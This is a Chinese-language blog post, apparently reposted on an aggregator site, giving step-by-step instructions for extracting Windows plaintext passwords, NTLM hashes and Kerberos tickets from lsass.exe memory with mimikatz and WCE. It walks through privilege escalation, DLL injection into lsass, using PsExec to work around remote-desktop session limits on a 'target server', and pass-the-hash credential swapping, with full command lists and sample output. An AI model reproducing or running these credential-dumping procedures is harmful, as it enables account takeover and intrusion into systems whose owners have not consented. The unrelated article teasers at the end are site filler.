服务器读取账号密码,WIN服务器得明文密码神器 mimikatz、WCE

一、mimikatz(自己亲试,可以在win7 x64下使用)

昨天有朋友发了个法国佬写的神器叫mimikatz 让我们看下

还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章

http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass

自己尝试了下用 win2008 r2 x64 来测试

5d78b1635d9bf5744bba2560128e6e97.png

最后测试成功 wdigest 就是我的明文密码

我还测过密码复杂度在14位以上

包含数字 大小写字母 特殊字符的密码

一样能抓出明文密码来

以前用 wce.exe 或 lslsass.exe 通常是只能从内存里顶多抓出active账号的 lm hash 和 ntlm hash

但用了这个神器抓出明文密码后

由此我们可以反推断 在 lsass.exe 里并不是只存有 lm hash 和 ntlm hash 而已

应该还存在有你的明文密码经过某种加密算法 (注意: 是加密算法 而不是hash算法 加密算法是可逆的 hash算法是不可逆的)

这样这个加密算法是可逆的 能被解密出明文

所以进程注入 lsass.exe 时 所调用的 sekurlsa.dll 应该包含了对应的解密算法

逆向功底比较好的童鞋可以尝试去逆向分析一下

然后这个神器的功能肯定不仅仅如此 在我看来它更像一个轻量级调试器

可以提升进程权限 注入进程 读取进程内存等等

下面展示一个 读取扫雷游戏的内存的例子

71f69c91059931fe674c1a198fa98a3d.png

我们还可以通过pause命令来挂起该进程 这个时候游戏的时间就静止了

ca17f6dbef320ea8319106db9114542c.png

总之这个神器相当华丽 还有更多能力有待各黑阔们挖掘 =..=~

使用方法:

1. 运行主程序:mimikatz.exe

2. 输入:privilege::debug      提升权限

3. 输入:inject::process lsass.exe sekurlsa.dll

将sekurlsa.dll  注入到lsass.exe 中

4. 输入:@getLogonPasswords   (注:此命令在我的win7 x64上没有用,可以通过sekurlsa::logonPasswords full命令来获取)

即可获取hash和当前用户的明文密码!

在远程终端(3389、mstsc.exe)、虚拟桌面中抓取密码的方法:通常你在远程终端中运行该程序会提示:存储空间不足,无法处理此命令。这是因为在终端模式下,不能插入远线程,跨会话不能注入,你需要使用如下方法执行该程序:

首先提取几个文件,只抓取密码的话,只需要这几个文件:

mimikatz_trunktoolsPsExec.exe

mimikatz_trunkWin32mimikatz.exe

mimikatz_trunkWin32sekurlsa.dll

打包后上传至目标服务器,然后解压释放,注意路径中绝对不能有中文(可以有空格)!否则加载DLL的时候会报错:找不到文件。

然后使用以下任何一种方法即可抓取密码:

01

//最简单实用的方法,使用 PsExec.exe 启动。

02

//在本机启动交互式命令提示窗口

03

psexec \\127.0.0.1 “C:\WINDOWS\system32\cmd.exe”

04

//启动 mimikatz.exe

05

C:\mimikatz_trunk\Win32\mimikatz.exe

06

//提升权限

07

privilege::debug

08

//注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)!

09

inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"

10

//抓取密码

11

@getLogonPasswords      或sekurlsa::logonPasswords full

12

//退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环。

13

exit

二、WCE

获取明文密码只需一个命令:wce.exe  -w     (需要在命令行下以管理员身份运行)

ad756a054fe8772a66a21cee4b88cca4.png

Windows Credentials Editor (WCE)

Windows Credentials Editor (WCE) is a security tool that allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets). This tool can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.), obtain Kerberos tickets and reuse them in other Windows or Unix systems and dump cleartext passwords entered by users at logon. WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing. It supports Windows XP, 2003, Vista, 7 and 2008.

Current Version: WCE v1.3beta (32-bit) (download) – WCE v1.3beta (64-bit) (download)

Old Versions (x32): WCE v1.2 (download), WCE v1.1 (download), WCE v1.0 (download)

Old Versions (x64): WCE v1.21 (download), WCE v1.2 (download)

——–

Windows Credentials Editor provides the following options:

Options:

-l  List logon sessions and NTLM credentials (default).

-s  Changes NTLM credentials of current logon session.

Parameters: :::.

-r  Lists logon sessions and NTLM credentials indefinitely.

Refreshes every 5 seconds if new sessions are found.

Optional: -r.

-c  Run in a new session with the specified NTLM credentials.

Parameters: .

-e  Lists logon sessions NTLM credentials indefinitely.

Refreshes every time a logon event occurs.

-o  saves all output to a file.

Parameters: .

-i  Specify LUID instead of use current logon session.

Parameters: .

-d  Delete NTLM credentials from logon session.

Parameters: .

-a  Use Addresses.

Parameters:

-f  Force ‘safe mode’.

-g              Generate LM & NT Hash.

Parameters: .

-K              Dump Kerberos tickets to file (unix & ‘windows wce’ form

at)

-k              Read Kerberos tickets from file and insert into Windows

cache

-w  Dump cleartext passwords stored by the digest authentication package

-v  verbose output.

Examples:

* List current logon sessions

C:\>wce -l

meme:meme:11111111111111111111111111111111:11111111111111111111111111111111

* List current logon sessions with verbose output enabled

C:\>wce -l -v

Current Logon Session LUID: 00064081h

Logon Sessions Found: 8

WIN-REK2HG6EBIS\auser:NTLM

LUID:0006409Fh

WIN-REK2HG6EBIS\auser:NTLM

LUID:00064081h

NT AUTHORITY\ANONYMOUS LOGON:NTLM

LUID:00019137h

NT AUTHORITY\IUSR:Negotiate

LUID:000003E3h

NT AUTHORITY\LOCAL SERVICE:Negotiate

LUID:000003E5h

WORKGROUP\WIN-REK2HG6EBIS$:Negotiate

LUID:000003E4h

\:NTLM

LUID:0000916Ah

WORKGROUP\WIN-REK2HG6EBIS$:NTLM

LUID:000003E7h

00064081:meme:meme:11111111111111111111111111111111:11111111111111111111111111111111

* Change NTLM credentials associated with current logon session

C:\>wce -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999

Changing NTLM credentials of current logon session (00064081h) to:

Username: auser

domain: admin

LMHash: 99999999999999999999999999999999

NTHash: 99999999999999999999999999999999

NTLM credentials successfully changed!

* Add/Change NTLM credentials of a logon session (not the current one)

C:\>wce -i 3e5 -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999

Changing NTLM credentials of logon session 000003E5h to:

Username: auser

domain: admin

LMHash: 99999999999999999999999999999999

NTHash: 99999999999999999999999999999999

NTLM credentials successfully changed!

* Delete NTLM credentials associated with a logon session

C:\>wce -d 3e5

NTLM credentials successfully deleted!

* Run WCE indefinitely, waiting for new credentials/logon sessions.

Refresh is performed every time a logon event is registered in the Event Log.

C:\>wce -e

* Run WCE indefinitely, waiting for new credentials/logon sessions

Refresh is every 5 seconds by default.

C:\>wce -r

* Run WCE indefinitely, waiting for new credentials/logon sessions, but refresh every 1 second (by default wce refreshes very 5 seconds)

C:\>wce -r5

* Generate LM & NT Hash.

C:\>wce -g test

Password:   test

Hashes:     01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537

* Dump Kerberos tickets to file (unix & ‘windows wce’ format)

C:\>wce -K

Converting and saving TGT in UNIX format to file wce_ccache…

Converting and saving tickets in Windows WCE Format to file wce_krbtkts..

5 kerberos tickets saved to file ‘wce_ccache’.

5 kerberos tickets saved to file ‘wce_krbtkts’.

Done!

* Read Kerberos tickets from file and insert into Windows cache

C:\>wce -k

Reading kerberos tickets from file ‘wce_krbtkts’…

5 kerberos tickets were added to the cache.

Done!

* Dump cleartext passwords stored by the Digest Authentication package

C:\>wce -w

test\MYDOMAIN:mypass1234

NETWORK SERVICE\WORKGROUP:test

GETLSASRVADDR.EXE

—————–

This tool can be used to obtain automatically needed addresses for WCE

to be able to read logon sessions and NTLM credentials from memory.

Addresses obtained can then be used with WCE using the -A switch.

This tool requires the dlls symsrv.dll and dbghelp.dll available from the

“Debugging Tools for Windows” package.

Additional Information

———————-

* http://www.ampliasecurity.com/research.html

* http://www.ampliasecurity.com/research/wcefaq.html

* http://www.ampliasecurity.com/research/WCE_Internals_RootedCon2011_ampliasecurity.pdf

* http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

整理下常用的命令

【list NTLM credentials in memory】

wce.exe

wce.exe -o output.txt

【dump logon cleartext passwords】

wce.exe -w

【change my current NTLM credentials】

wce.exe -s :::

【create a new logon session and launch a program with new NTLM credentials】

wce.exe -s ::: -c

【generate NTLM hashes】

wce.exe -g

【Safe mode No injection】

wce.exe -f

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/523102.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

100%移植阿里云移动测试技术,竟仅需1周?!——移动测试专有云(3)——内容详解...

摘要: Android兼容性测试旨在帮助解决Android应用在不同真机机型上的各类兼容性问题,包括 Crash/ANR分析、6项性能分析、UI检测、3个版本的覆盖安装检测等。Android兼容性测试使用非常简单,客户只需要提交被检测的APK文件(如需登录…

投篮机投篮有技巧吗_「技巧干货」高手练习投篮的几个技巧,让投篮变得更实用...

会打篮球的都知道,篮球主要的是用更高于对手的得分来取得胜利;然而,让很多的球友烦恼的是,投篮时因为不够稳定,而导致每一场的发挥都不一样,全靠运气投球;这可是球场上的一大禁忌,人…

天龙八部服务器都需要那种系统,天龙八部排行榜系统怎么看 排行榜系统分类介绍...

天龙八部排行榜系统怎么看?有这么一群人,不但战力高,等级高,在其他玩家眼中,他们就是膜拜的大神,他们便是游戏中排行榜上的大神玩家。排行榜分类等级:排行榜打开后的第一个排名就是玩家角色的等级排名&…

SDN精华问答 | 了解SDN架构

SDN火热了好一阵子,无论运营商、政府企业、投资机构,一段时间,不知道SDN、不能甩几个SDN相关的名词术语,似乎都落后于时代了。今天,就来看看关于SDN的精华问答吧。1Q:SDN的本质属性? A&#xff…

SpringBoot2整合Activiti6工作流框架

文章目录下载实战操作:创建用户3 创建app4 选择我们的指定的流程图下载 wget https://github.com/Activiti/Activiti/releases/download/activiti-6.0.0/activiti-6.0.0.zip浏览器 http://localhost:8080/activiti-app/#实战操作: 创建用户 2.创建流程…

如何转obj_Java 开发中如何正确的踩坑,看完这个你可以避免50%的错误

为什么说一个好的员工能顶 100 个普通员工我们的做法是,要用最好的人。我一直都认为研发本身是很有创造性的,如果人不放松,或不够聪明,都很难做得好。你要找到最好的人,一个好的工程师不是顶10个,是顶100个…

ajax 在新选卡打开,开始使用 AJAX 控制工具包 (VB) | Microsoft Docs

AJAX 控件工具包入门 (VB)05/12/2009本文内容了解开始使用 AJAX 控制工具包所需的所有知识。AJAX 控制工具包包含 30 多个免费控件,可用于ASP.NET应用程序中。 在本教程中,您将了解如何下载 AJAX 控件工具包,并将工具包控件添加到可视化工作室…

IBM斥资340亿美元完成收购红帽;亚马逊云计算Q2营收数据新鲜出炉;甲骨文推出Oracle专用自治数据库云……...

关注并标星星CSDN云计算极客头条:速递、最新、绝对有料。这里有企业新动、这里有业界要闻,打起十二分精神,紧跟fashion你可以的!每周三次,打卡即read更快、更全了解泛云圈精彩newsgo go go Waymo应用(图片来…

AliOS Things全链路优化-CoAP FOTA

摘要: FOTA(Firmware Over-The-Air)即空中固件升级功能;CoAP(Constrained Application Protocol),字面意思为受限的应用协议,基于UDP,专为资源有限的物联网设备量身定制;所以AliOS Things的纯Co…

关于IoT网络的一些特征的探讨

摘要: 网络是IoT设备非常关键的部分,本文和大家一起探讨IoT网络的几个重要特征,及AliOS Things尝试提供的一些解决方案。 IoT网络的特征包括IP网络,UDP网络,多种通信手段及拓扑。而AliOS Things也尝试提供包括CoAP,SAL…

字典 学生成绩等级_python-列表及字典进阶

# -*- coding: utf-8 -*-l list(python) print(l) l[2:] zza print(l)numbers [1, 5] print(numbers)numbers[1:1] [2, 3, 4] print(numbers)numbers[1:4] [] print(numbers)d {lilei: 98, hanmeimei: 99} # 写字典的方法 print(d)message [(lilei, 98), (hanmeimei, 9…

highcharts ajax 数据格式,Highcharts ajax获取json对象动态生成报表生成 .

最近做个项目,项目经理想做一个统计报表,在网上查看些资料就选用Highchars 这里和大家分享下使用心得。重点说明此代码是针对一个报表显示多个项对比显示。直接贴代码:web端$(document).ready(function() {var options {chart: {renderTo: c…

5G承载网,到底有哪些关键技术?

戳蓝字“CSDN云计算”关注我们哦!作者 | 小枣君来源 | 鲜枣课堂之前小枣君给大家介绍了5G承载网的基本知识(链接:5G承载网到底有什么不同?)。今天,我们再来看看5G承载网中的常见关键技术。首先&#xff0c…

SpringBoot2整合Activiti6工作流框架 源码

git clone gitgithub.com:gb-heima/Activiti.git 创建分支 cd Activiti git checkout -b study6 activiti-6.0.0编译项目 mvn clean test-compilercd modules/activiti-ui//activiti-appmvn clean tomca7:rundemo开始 流程图绘制 首先创建一个基本的maven工程 初步流程图效果…

一个智能运维算法测试方法

摘要: 质量是企业长远生存的根基,是企业竞争的免死金牌。作为质量控制团队的一员,保障和提高所负责系统的质量,是工作的核心。而完善的测试覆盖,是保证质量的有效手段。 写在前面 质量是企业长远生存的根基&#xff0…

阿里巴巴1682亿背后的“企业级”高效持续交付

摘要: 在2017北京云栖大会上,阿里巴巴高级技术专家陈鑫(花名神秀),给大家带来了《1682亿背后的企业级高效持续交付》,引起强烈共鸣。神秀从技术负责人关心的研发流程混乱、质量无法保障、环境管理低效、资源…

星形和雪花模型_数据仓库多维数据模型设计

建设数据模型既然是整个数据仓库建设中一个非常重要的关键部分,那么,怎么建设我们的数据仓库模型就是我们需要解决的一个问题。这里我们将要详细介绍如何创建适合自己的数据模型。数据仓库建模方法大千世界,表面看五彩缤纷,实质上…

可视化流程设计器 Activiti Designer

插件安装地址:http://activiti.org/designer/update 插件使用手册:http://www.activiti.org/userguide/index.html#activitiDesigner Intellij IDEA版本: http://plugins.jetbrains.com/plugin/7429?pridea (或在插件中心搜索actiBPM)

FreeWheel是一家怎样的公司?| 人物志

戳蓝字“CSDN云计算”关注我们哦!人物志:观云、盘点、对话英雄。以云计算风云人物为核心,聚焦个人成长、技术创新、产业发展,还原真实与鲜活!作者 | 孙浩峰在知乎上有一个帖子,题目就是“FreeWheel是一家怎…

2017双11技术揭秘—千亿级流量来袭,如何用硬件加速技术为CPU减负?

摘要: 在刚过去的2017年双11零点流量高峰的考验下,主站接入层Tengine Gzip硬件加速机器运行平稳、同等条件下相比于未开启QAT加速的机器性能提升21%左右。 作者:王发康(毅松) 主站接入层是阿里2015年全站HTTPS项目诞生…